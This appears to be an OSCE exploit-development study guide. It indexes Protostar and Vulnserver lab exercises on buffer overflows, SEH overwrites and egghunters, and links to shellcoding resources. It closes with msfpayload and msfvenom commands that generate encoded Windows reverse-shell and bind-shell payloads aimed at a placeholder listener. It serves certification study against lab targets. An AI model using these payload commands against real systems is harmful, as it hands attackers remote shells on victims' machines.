- Backdooring PE - Weaponizing Your Favorite PE
- SEH + Egghunter (Manual Encoding) - HP OpenView NNM 7.5 Exploitation
Exploit Exercise (Protostar)
| Module | Link | Note |
|---|---|---|
| Stack0 | Stack BOF Intro | N/A |
| Stack1 | Stack BOF Basic1 | N/A |
| Stack2 | Stack BOF Basic2 | N/A |
| Stack3 | Stack BOF Basic3 | N/A |
| Stack4 | Stack BOF Basic4 | N/A |
| Stack5 | Stack BOF Shellcode | |
| Stack6 | Stack BOF ret2libc | ROP is not needed for OSCE |
| Stack7 | Stack BOF ret2.text | ROP is not needed for OSCE, but use this module to learn the POP; POP; RET concept |
Vulnserver (Vulnserver)
| Series | Link | Command | Vulnerability | Note |
|---|---|---|---|---|
| Part 1 | Read | N/A | N/A | Lab Setup |
| Part 2 | Read | TRUN | EIP Overwrite | |
| Part 3 | Read | GMON | SEH Overwrite + Short JMP + Egghunter | |
| Part 4 | Read | KSTET | EIP Overwrite + Short JMP + Egghunter | |
| Part 5 | Read | HTER | EIP Overwrite + Restricted Characters + Manual Offset Finding | |
| Part 6 | Read | GTER | EIP Overwrite + Socket Reuse Exploit | |
| Part 7 | Read | LTER | SEH Overwrite + Restricted Characters + Encoded Payloads | |
- Study Plan - https://www.abatchy.com/2017/03/osce-study-plan
- Prep Guide - https://tulpa-security.com/2017/07/18/288/
- Mona.py - https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/
- Techryptic - Great Tips
- Jack Halon - https://jhalon.github.io/OSCE-Review/
- Connor McGarr - https://connormcgarr.github.io/CTP-OSCE-Thoughts/
- Examples - https://github.com/dhn/OSCE
- OSCE_Bible - https://github.com/mohitkhemchandani/OSCE_BIBLE
- FullShade - https://github.com/FULLSHADE/OSCE (*POCs)
- h0mbre - https://github.com/h0mbre/CTP-OSCE (*Good helpers)
- ihack4falafel - https://github.com/ihack4falafel/OSCE
- FuzzSecurity - http://fuzzysecurity.com/tutorials.html
- SecuritySift - http://www.securitysift.com/
Fuzzing
Structured Exception Handler (SEH)
Egghunter
ASLR
Shellcoding
- Exploit Writing Part 9 - Shellcoding
- https://www.fuzzysecurity.com/tutorials/expDev/6.html
- http://sh3llc0d3r.com/windows-reverse-shell-shellcode-i/
- http://www.vividmachines.com/shellcode/shellcode.html#ws
- Jumping to Shellcode - https://connormcgarr.github.io/CTP-OSCE-Thoughts/
- Alphanumeric Shellcode 1 - https://blog.knapsy.com/blog/2017/05/01/quickzip-4-dot-60-win7-x64-seh-overflow-egghunter-with-custom-encoder/
- Alphanumeric Shellcode 2 - https://connormcgarr.github.io/Admin-Express-0day/
Opcode
- 32-bit Opcode Table - http://sparksandflames.com/files/x86InstructionChart.html
- Types of Jump - http://www.unixwiz.net/techtips/x86-jumps.html
- ASM Assembler/Disassembler - https://defuse.ca/online-x86-assembler.htm#disassembly
Web Application
Windows API
```shell
# Reverse shell payload in C-array format (legacy msfpayload syntax)
/pentest/exploits/framework/msfpayload windows/shell_reverse_tcp LHOST=192.168.x.x LPORT=443 C

# Same payload with msfvenom, alphanumeric-encoded (x86/alpha_mixed), raw output
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.x.x LPORT=443 -a x86 --platform=win -e x86/alpha_mixed -f raw

# Bind shell: raw msfpayload output piped through msfencode into Perl format
msfpayload windows/shell_bind_tcp R > bind
msfencode -e x86/alpha_mixed -i bind -t perl

# Equivalent single msfvenom command
msfvenom -p windows/shell_bind_tcp -a x86 --platform=win -e x86/alpha_mixed -f perl
```